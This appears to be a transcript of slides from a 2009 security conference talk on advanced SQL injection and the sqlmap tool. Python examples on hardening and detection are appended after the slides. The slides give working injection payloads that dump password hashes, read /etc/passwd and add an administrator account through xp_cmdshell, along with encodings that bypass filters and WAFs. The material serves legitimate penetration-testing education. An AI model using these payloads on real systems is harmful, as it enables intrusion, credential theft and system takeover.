SQL injection: Not Only AND 1=1
  Bernardo Damele Assumpção Guimarães
The presentation has a quick preamble on SQL injection definition, sqlmap and its key features.
I will then illustrate in detail common and uncommon problems, and their respective solutions with examples, that a penetration tester faces when he wants to take advantage of any kind of web application SQL injection flaw on real-world web applications, for instance SQL injection in ORDER BY and LIMIT clauses, single entry UNION query SQL injection, specific web application technologies IDS bypasses and more.

These slides were presented at the 2nd Digital Security Forum in Lisbon on June 27, 2009.

Updated version of http://www.slideshare.net/inquis/sql-injection-not-only-and-11.


  1. SQL injection: Not Only AND 1=1
     Bernardo Damele Assumpção Guimarães
  2. Who I am
     - Bernardo Damele Assumpção Guimarães
     - Proud father
     - Penetration tester / security researcher, Portcullis Computer Security Ltd
     - Open source projects:
       - sqlmap lead developer
       - MySQL UDF repository developer
       - Metasploit contributor
     2nd Digital Security Forum, Lisbon (Portugal) June 27, 2009
  3. SQL injection definition
     - SQL injection attacks are a type of injection attack, in which SQL commands are injected into data-plane input in order to affect the execution of predefined SQL statements
     - It is a common threat in web applications that lack proper sanitization of user-supplied input used in SQL queries
     - It does not affect only web applications!
     - A long list of resources can be found on my delicious profile, http://delicious.com/inquis/sqlinjection
  4. How does it work?
     - Detection of a possible SQL injection flaw
     - Back-end database management system fingerprint
     - SQL injection vulnerability can lead to:
       - DBMS data exfiltration and manipulation
       - File system read and write access
       - Operating system control
  5. sqlmap – http://sqlmap.sourceforge.net
     - Open source command-line automatic tool
     - Detect and exploit SQL injection flaws in web applications
     - Developed in Python since July 2006
     - Released under GPLv2
  6. sqlmap key features
     - Full support for MySQL, Oracle, PostgreSQL and Microsoft SQL Server
     - Three SQL injection techniques:
       - Boolean-based blind
       - UNION query
       - Batched (stacked) queries
     - Perform an extensive back-end DBMS fingerprint
     - Enumerate users, password hashes, privileges, databases, tables, columns and their data-type
  7. sqlmap key features
     - Dump entire or user specified database table entries
     - Run own SQL statements
     - Read either text or binary files from the file system
     - Execute arbitrary commands on the operating system
     - Establish an out-of-band stateful connection between the attacker box and the database server
  8. Database management system fingerprint
     - sqlmap implements up to four techniques:
       - Inband error messages
       - Banner (version(), @@version, …) parsing
       - SQL dialect
       - Specific functions static output comparison
  9. Database management system fingerprint
     - Example of basic back-end DBMS fingerprint on Oracle 10g Express Edition
     - Two techniques:
       - Specific variables
       - Specific functions static output comparison
     - The two possible queries to fingerprint it are:
         AND ROWNUM=ROWNUM
         AND LENGTH(SYSDATE)=LENGTH(SYSDATE)
  10. Database management system fingerprint
     - Example of extensive back-end DBMS fingerprint on Microsoft SQL Server 2005
     - Three techniques:
       - Active fingerprint: Microsoft SQL Server 2005
       - Banner parsing fingerprint: Microsoft SQL Server 2005 Service Pack 0 version 9.00.1399
       - HTML error message fingerprint: Microsoft SQL Server
     - Active fingerprint refers to specific functions’ static output comparison in this example
  11. Database management system fingerprint
     - Examples of SQL dialect fingerprint:
       - On MySQL:
           /*!50067 AND 47=47 */
       - On PostgreSQL:
           AND 82::int=82
  12. More on fingerprint
     - Fingerprinting is a key step in penetration testing
       - It is not only about back-end DBMS software
     - There are techniques and tools to fingerprint the web server, the web application technology and their underlying system
     - What about the back-end DBMS underlying operating system?
  13. More on fingerprint
     - sqlmap can fingerprint them without making extra requests:
       - Web/application server and web application technology: by parsing the HTTP response headers
         - Known basic technique
       - Back-end DBMS operating system: by parsing the DBMS banner
         - Over-looked technique
  14. SQL statement syntax
     - Identifying the web application query syntax is mandatory
     - It is needed to correctly exploit the flaw
     - Example:
         "SELECT id, user FROM users WHERE id LIKE ((('%" . $_GET['id'] . "%'))) LIMIT 0, 1"
  15. SQL statement syntax
     - Possible exploitation vector:
         page.php?id=1'))) AND ((('RaNd' LIKE 'RaNd
     - For a boolean-based blind SQL injection exploit:
         1'))) AND ORD(MID((SQL query), Nth SQL query output character, 1)) > Bisection algorithm number AND ((('RaNd' LIKE 'RaNd
  16. SQL statement syntax
     - For a UNION query SQL injection exploit:
         1'))) UNION ALL SELECT NULL, Concatenated SQL query# AND ((('RaNd' LIKE 'RaNd
     - For a batched query SQL injection exploit:
         1'))); SQL query;# AND ((('RaNd' LIKE 'RaNd
  17. Bypass number of columns limitation
     - You’ve got a SQL injection point vulnerable to UNION query technique detected by:
       - ORDER BY clause brute-forcing
       - NULL brute-forcing
       - Sequential number brute-forcing
     - The number of columns in the SELECT statement is fewer than the number of columns that you want to inject
  18. Bypass number of columns limitation
     - Concatenate your SELECT statement columns with random delimiters in a single output
     - Example:
       - The original SELECT statement has only one column:
           SELECT col FROM tbl WHERE id=1
       - Back-end DBMS is PostgreSQL 8.3
       - We want to retrieve users’ password hashes
  19. Bypass number of columns limitation
         SELECT usename, passwd FROM pg_shadow
         ↓
         UNION ALL SELECT, CHR(109)||CHR(107)||CHR(100)||CHR(83)||CHR(68)||CHR(111)||COALESCE(CAST(usename AS CHARACTER(10000)), CHR(32))||CHR(80)||CHR(121)||CHR(80)||CHR(121)||CHR(66)||CHR(109)||COALESCE(CAST(passwd AS CHARACTER(10000)), CHR(32))||CHR(104)||CHR(108)||CHR(74)||CHR(103)||CHR(107)||CHR(90), FROM pg_shadow--
  20. Single entry UNION query SQL injection
     - You’ve got a parameter vulnerable to UNION query SQL injection
     - The page displays only the query’s first entry output
     - Change the parameter value to its negative value or append a false AND condition to the original parameter value
       - Cause the original query to produce no output
  21. Single entry UNION query SQL injection
     - Inspect and unpack the SQL injection statement:
       - Calculate its output number of entries
       - Limit it to return one entry at a time
       - Repeat the previous action N times where N is the number of output entries
  22. Single entry UNION query SQL injection
     - Example on MySQL 4.1 to enumerate the list of databases:
         SELECT db FROM mysql.db
         ↓
         SELECT … WHERE id=1 AND 3=2 UNION ALL SELECT CONCAT(CHAR(100,84,71,69,87,98),IFNULL(CAST(db AS CHAR(10000)), CHAR(32)), CHAR(65,83,118,81,87,116)) FROM mysql.db LIMIT Nth, 1# AND 6972=6972
  23. Single entry UNION query SQL injection
     - Another technique consists of retrieving entries as a single string
     - Example on MySQL 5.0:
         SELECT user, password FROM mysql.user
         ↓
         SELECT GROUP_CONCAT(CONCAT(user, 'RaND', password)) FROM mysql.user
  24. Getting a SQL shell
     - sqlmap has options to enumerate / dump different types of data from the back-end DBMS
     - It also allows the user to run custom SQL queries
     - It inspects the provided statement:
       - SELECT: it goes blind or UNION query to retrieve the output
       - DDL, DML, etc: it goes batched query to run it
  25. SQL injection: Not only WHERE clause
     - Most of the SQL injections occur within the WHERE clause, but GROUP BY, ORDER BY and LIMIT can also be affected
     - SQL injection within these clauses can be exploited to perform a blind injection or, in some cases, a UNION query injection
     - In all cases batched query injection is possible
  26. SQL injection in GROUP BY clause
     - Example on MySQL 5.0:
         "SELECT id, name FROM users GROUP BY " . $_GET['id']
         ↓
         SELECT id, name FROM users GROUP BY 1, (SELECT (CASE WHEN (condition) THEN 1 ELSE 1*(SELECT table_name FROM information_schema.tables) END))
  27. SQL injection in ORDER BY clause
     - Example on PostgreSQL 8.2:
         "SELECT id, name FROM users ORDER BY " . $_GET['id']
         ↓
         SELECT id, name FROM users ORDER BY 1, (SELECT (CASE WHEN (condition) THEN 1 ELSE 1/0 END))
  28. SQL injection in LIMIT clause
     - Example on MySQL 6.0:
         "SELECT id, name FROM users LIMIT 0, " . $_GET['id']
         ↓
         SELECT id, name FROM users LIMIT 0, 1 UNION ALL SELECT (CASE WHEN (condition) THEN 1 ELSE 1*(SELECT table_name FROM information_schema.tables) END), NULL
  29. SQL injection payloads to bypass filters
     - There are numerous techniques to bypass:
       - Web application language security settings
       - Web application firewalls
       - Intrusion [Detection|Prevention] Systems
       - Web server security settings
     - These techniques can be combined
  30. PHP Magic Quotes misuse: Bypass
     - You’ve a SQL injection point in a GET, POST parameter or Cookie value
     - Web application language is PHP
       - magic_quotes_gpc setting is On or addslashes() is used within the source code
     - Back-end DBMS is either Microsoft SQL Server or Oracle
       - Their escaping character for single quote is single quote
  31. PHP Magic Quotes misuse: Bypass
     - Original statement:
         "SELECT name, surname FROM users WHERE name='" . $_GET['name'] . "'"
     - Example of a successful exploit:
         foobar' OR 10>4--
     - Query passed by PHP to the back-end DBMS:
         SELECT name, surname FROM users WHERE name='foobar' OR 10>4--'
  32. PHP Magic Quotes misuse: Bypass
     - For a UNION query SQL injection exploit:
         SELECT name, surname FROM users WHERE name='foobar' UNION ALL SELECT NAME, PASSWORD FROM SYS.USER$--'
     - For a boolean-based blind SQL injection exploit:
         SELECT name, surname FROM users WHERE name='foobar' OR ASCII(SUBSTR((SQL query), Nth SQL query output char, 1)) > Bisection algorithm number--'
  33. PHP Magic Quotes bypass: Avoid single quotes
     - Example on MySQL:
         LOAD_FILE('/etc/passwd')
         ↓
         LOAD_FILE(CHAR(47,101,116,99,47,112,97,115,115,119,100))
         or
         LOAD_FILE(0x2f6574632f706173737764)
     - It is not limited to bypass only PHP Magic Quotes
  34. Bypass with percentage char on ASP
     - ASP ignores % if not followed by a valid pair of characters
     - Example on ASP with back-end DBMS PostgreSQL:
         SELECT pg_sleep(3)
         ↓
         S%ELEC%T %p%g_sle%ep(%3)
  35. Bypass by hex-encoding the SQL statement
     - Example on Microsoft SQL Server:
         exec master..xp_cmdshell 'NET USER myuser mypass /ADD & NET LOCALGROUP Administrators myuser /ADD'
         ↓
         DECLARE @rand varchar(8000) SET @rand =
         0x65786563206d61737465722e2e78705f636d6473
         68656c6c20274e45542055534552206d7975736572
         206d7970617373202f4144442026204e4554204c4f
         43414c47524f55502041646d696e6973747261746f
         7273206d7975736572202f41444427; EXEC (@rand)
  36. Bypass by comments as separators
     - Example on MySQL:
         SELECT user, password FROM mysql.user
         ↓
         SELECT/*R_aNd*/user/*rA.Nd*/,/*Ran|D*/password/*r+anD*/FROM/*rAn,D*/mysql.user
  37. Bypass by random mixed case payload
     - Example on Oracle 10g:
         SELECT banner FROM v$version WHERE ROWNUM=1
         ↓
         SeLEcT BaNneR FroM v$vERsIon WhERe ROwNUm=1
  38. Bypass by random URI encoded payload
     - Example on PostgreSQL:
         SELECT schemaname FROM pg_tables
         ↓
         %53E%4c%45%43T%20%73%63h%65%6d%61%6ea%6de%20%46%52O%4d%20%70g%5f%74a%62%6ce%73
  39. SQL injection to operating system full control
     - We’ve seen how to detect and exploit different SQL injection flaws, retrieve and manipulate data on the DBMS and bypass web application filters… what else?
     - Check my recent research about compromising the underlying file system and the operating system via SQL injection on http://tinyurl.com/sqlmap1
  40. Credits
     - Chip Andrews, www.sqlsecurity.com
     - Alberto Revelli, sqlninja.sourceforge.net
     - Sumit Siddharth, www.notsosecure.com
     - Alessandro Tanasi, lab.lonerunners.net
     - Ralf Braga, www.linkedin.com/in/ralfbraga
  41. Questions?
     - Bernardo Damele Assumpção Guimarães
     - bernardo.damele@gmail.com
     - http://bernardodamele.blogspot.com
     - http://sqlmap.sourceforge.net
     - Thanks for your attention!
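
Slides 30 to 32 turn on a mismatch: addslashes() escapes a single quote with a backslash, while the back-end DBMS escapes it by doubling it. The following is an added example, not code from the slides or from sqlmap; it assumes SQLite as a stand-in for Microsoft SQL Server and Oracle (it also treats a backslash as an ordinary character), a Python re-implementation of addslashes(), and constructed table rows, and it contrasts the concatenated query from slide 31 with a bound parameter.

```python
import sqlite3


def addslashes(value: str) -> str:
    """Python equivalent of PHP addslashes(): backslash-escape ' " \\ and NUL."""
    out = []
    for ch in value:
        if ch in ("'", '"', "\\"):
            out.append("\\" + ch)
        elif ch == "\0":
            out.append("\\0")
        else:
            out.append(ch)
    return "".join(out)


def make_users_db() -> sqlite3.Connection:
    """In-memory table with constructed rows (not data from the slides)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, surname TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("alice", "Smith"), ("bob", "Jones")])
    return conn


def lookup_concatenated(conn: sqlite3.Connection, name: str) -> list:
    """Slide 31 pattern: escape with addslashes(), then concatenate.

    The DBMS reads the backslash as data, so the quote that follows still
    closes the string literal and the rest of the input is parsed as SQL.
    """
    sql = ("SELECT name, surname FROM users WHERE name='"
           + addslashes(name) + "'")
    return conn.execute(sql).fetchall()


def lookup_bound(conn: sqlite3.Connection, name: str) -> list:
    """Hardened form: the value is sent as a bound parameter, never as SQL text."""
    sql = "SELECT name, surname FROM users WHERE name=?"
    return conn.execute(sql, (name,)).fetchall()


if __name__ == "__main__":
    db = make_users_db()
    slide_31_input = "foobar' OR 10>4--"      # input shown on slide 31
    print("escaped input :", addslashes(slide_31_input))
    print("concatenated  :", lookup_concatenated(db, slide_31_input))
    print("bound         :", lookup_bound(db, slide_31_input))
```
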
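
Slides 25 to 28 concatenate request input into GROUP BY, ORDER BY and LIMIT, positions where a column name or keyword cannot be supplied as a bound value. The following is an added example of the hardened counterpart, not code from the slides or from sqlmap; it assumes SQLite, a constructed users table and hypothetical function names, and it maps the sort column and direction through allowlists and binds LIMIT as an integer.

```python
import sqlite3

# Request value -> SQL text. Only these literals ever reach the statement.
SORTABLE = {"id": "id", "name": "name"}
DIRECTIONS = {"asc": "ASC", "desc": "DESC"}
MAX_LIMIT = 100


def make_list_db() -> sqlite3.Connection:
    """In-memory table with constructed rows (not data from the slides)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, name TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [(1, "carol"), (2, "alice"), (3, "bob")])
    return conn


def list_users_vulnerable(conn: sqlite3.Connection, order_by: str) -> list:
    """Slide 27 pattern: whatever the client sends is parsed as SQL."""
    sql = "SELECT id, name FROM users ORDER BY " + order_by
    return conn.execute(sql).fetchall()


def list_users(conn: sqlite3.Connection, sort: str = "id",
               direction: str = "asc", limit: str = "10") -> list:
    """Hardened form: identifiers come from allowlists, LIMIT is bound."""
    column = SORTABLE.get(sort)
    keyword = DIRECTIONS.get(direction.lower())
    if column is None or keyword is None:
        raise ValueError("unsupported sort column or direction")
    # Accept plain ASCII digits only, so no expression can ride along.
    if not (limit.isascii() and limit.isdigit()):
        raise ValueError("limit must be a non-negative integer")
    row_count = min(int(limit), MAX_LIMIT)
    sql = f"SELECT id, name FROM users ORDER BY {column} {keyword} LIMIT ?"
    return conn.execute(sql, (row_count,)).fetchall()


def is_rejected(conn: sqlite3.Connection, **kwargs) -> bool:
    """True when list_users() refuses the request before touching the DBMS."""
    try:
        list_users(conn, **kwargs)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    db = make_list_db()
    # Slide 27 statement shape with a constant condition filled in.
    slide_27_input = "1, (SELECT (CASE WHEN (1=1) THEN 1 ELSE 1/0 END))"
    print("vulnerable accepts:", list_users_vulnerable(db, slide_27_input))
    print("hardened rejects  :", is_rejected(db, sort=slide_27_input))
    print("normal request    :", list_users(db, "name", "desc", "2"))
```
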
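
Slides 34 and 36 to 38 defeat filters that inspect the raw request, because the payload only takes its final form after decoding. The following is an added detection-side example, not code from the slides or from sqlmap; the two signatures and the function names are hypothetical, the samples are the transformed strings shown on those slides, and the normalizer also unwraps the MySQL versioned comment from slide 11 instead of discarding it.

```python
import re

# %XX is decoded; a % not followed by two hex digits is dropped (slide 34).
_PERCENT = re.compile(r"%([0-9A-Fa-f]{2})?")
# MySQL runs the body of /*!NNNNN ... */, so keep the body (slide 11).
_MYSQL_VERSIONED = re.compile(r"/\*!\d*(.*?)\*/", re.S)
# Any other inline comment acts as a token separator (slide 36).
_COMMENT = re.compile(r"/\*.*?\*/", re.S)

# Hypothetical signatures, written against normalized (lower-case) text.
SIGNATURES = {
    "select-from": re.compile(r"\bselect\b.+\bfrom\b"),
    "pg_sleep": re.compile(r"\bpg_sleep\s*\("),
}


def normalize(raw: str) -> str:
    """Reduce a request value to the form the SQL parser would receive."""
    text = _PERCENT.sub(
        lambda m: chr(int(m.group(1), 16)) if m.group(1) else "", raw)
    text = _MYSQL_VERSIONED.sub(r" \1 ", text)
    text = _COMMENT.sub(" ", text)
    return " ".join(text.lower().split())     # fold case, collapse whitespace


def match(text: str) -> list:
    """Names of the signatures that fire on text, used as given."""
    return sorted(name for name, rx in SIGNATURES.items() if rx.search(text))


def detect(raw: str) -> list:
    """Signature match performed after normalization."""
    return match(normalize(raw))


# Transformed payloads exactly as shown on slides 34, 36, 37 and 38.
SAMPLES = {
    "asp_percent": "S%ELEC%T %p%g_sle%ep(%3)",
    "comments": ("SELECT/*R_aNd*/user/*rA.Nd*/,/*Ran|D*/password"
                 "/*r+anD*/FROM/*rAn,D*/mysql.user"),
    "mixed_case": "SeLEcT BaNneR FroM v$vERsIon WhERe ROwNUm=1",
    "uri_encoded": ("%53E%4c%45%43T%20%73%63h%65%6d%61%6ea%6de%20"
                    "%46%52O%4d%20%70g%5f%74a%62%6ce%73"),
}

if __name__ == "__main__":
    for label, raw in SAMPLES.items():
        print(f"{label:12} raw={match(raw)} normalized={detect(raw)}"
              f" -> {normalize(raw)!r}")
```

The hex-encoded and CHAR()-encoded forms on slides 33 and 35 are decoded by the DBMS itself and are outside what this normalizer covers.
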